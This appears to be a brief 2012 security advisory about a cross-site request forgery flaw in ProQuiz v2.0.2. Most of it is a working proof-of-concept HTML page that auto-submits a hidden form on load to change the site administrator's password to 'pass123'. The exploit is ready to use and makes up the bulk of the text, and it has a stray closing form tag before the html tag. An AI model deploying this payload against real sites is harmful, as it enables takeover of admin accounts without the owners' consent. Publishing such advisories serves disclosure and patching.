|
|
| |
| ProQuiz v2.0.2 suffers from CSRF vulnerability. |
| |
Credit:
The information has been provided by DaOne.
|
| |
Vulnerable Systems:
* ProQuiz v2.0.2
[#] [ CSRF Change Admin Password ]
</form>
<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://[target]/functions.php?action=edit_profile&type=password">
<input type="hidden" name="password" value="pass123"/>
<input type="hidden" name="cpassword" value="pass123"/>
</form>
</body>
</html>
Disclosure Timeline:
Published: 2012-08-16
|
|
blog comments powered by
|